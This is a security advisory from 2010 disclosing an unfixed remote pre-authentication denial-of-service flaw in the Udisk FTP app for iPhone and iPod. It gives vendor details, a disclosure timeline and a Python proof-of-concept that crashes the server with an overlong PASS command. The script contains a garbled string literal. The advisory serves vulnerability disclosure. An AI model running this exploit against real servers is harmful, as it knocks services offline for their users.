Post edited 13:29 – January 12, 2010 by mr_me
Advisory : CORELAN-14-003
Disclosure date : 12th January 2010
0×00 : Vulnerability information
——————————–
Product : Apple Iphone/Ipod – Udisk FTP basic edition Remote pre-auth DOS vulnerability
[*] Version : 1.0
[*] Vendor : http://6tags.com
[*] URL : http://6tags.com/n/index.php/i…..disk/intro
[*] Type of vulnerability : Remote DOS
[*] Risk rating : Medium
[*] Issue fixed in version : <not fixed>
[*] Vulnerability discovered by : mr_me
[*] Greetings to : corelanc0d3r, rick2600, ekse & MarkoT from Corelan Team
0×01 : Vendor description of software
————————————-
From the vendor website:
U.Disk is an easy used application, with stand FTP server build in. With this feature, you can upload or download thousands of files by on click. Just use Copy & Paste to access files. Like your real U-Disk.
0×02 : Vulnerability details
—————————-
Remote Denial of Service:
When the application is sent a password (PASS) command with characters of size 2047 the application crashs.
Remote code execution maybe possible.
0×03 : Vendor communication
—————————
3rd January, 2010 : Vendor contacted
[*] 9th January 2010 : Vendor reminded of vulnerability
[*] 12th January 2010 : Public Disclosure
0×04 : Exploit/PoC
——————
#!/usr/bin/python
print "[+] Apple Iphone/Ipod – Udisk FTP basic edition 0day Remote DOS exploit"
import socket
import sys
def Usage():
print ("Usage: ./udisk.py <serv_ip>\\n")
print ("Example:./udisk.py 192.168.2.3\\n")
if len(sys.argv) <> 2:
Usage()
sys.exit(1)
else:
hostname = sys.argv[1]
username = "anonymous"
passwd = "x41? * 2047
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 8080))
print "[+] Connecting to the target.."
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] Sending payload.."
sock.send("USER %s\\r\\n" %username)
sock.send("PASS %s\\r\\n" %passwd)
sock.send("PWD\\r\\n")
sock.close()
print "[+] Server is now DOS'ed ;)"
sys.exit(0);
Home
Print this Post 
